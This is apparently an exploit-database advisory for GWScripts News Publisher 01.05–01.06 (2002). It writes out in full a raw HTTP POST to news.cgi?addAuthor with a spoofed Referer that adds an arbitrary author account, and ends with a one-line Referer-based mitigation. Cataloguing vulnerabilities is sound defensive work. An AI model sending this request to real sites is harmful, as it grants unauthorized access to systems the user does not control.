vendor:
News Publisher
by:
n30
3.3
CVSS
MEDIUM
Remote user to add an author to the author index
264
CWE
Product Name: News Publisher
Affected Version From: 01.05
Affected Version To: 01.06
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Unix and Winnt
2002
News Publisher EXPLOIT
It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by requesting the following raw HTTP request using any arbitrary username and password: POST /cgi-bin/news/news.cgi?addAuthor HTTP/1.0 Connection: close User-Agent: user/browser Host: target Referer: http://target/cgi-bin/news/news.cgi Content-type: application/x-www-form-urlencoded Content-length: 71 author=<username>&apassword=<password>&email=<email address>&name=<username>&password=<password>
Mitigation:
Ensure that the HTTP_REFERER url is not the same as the News Publisher news.cgi file.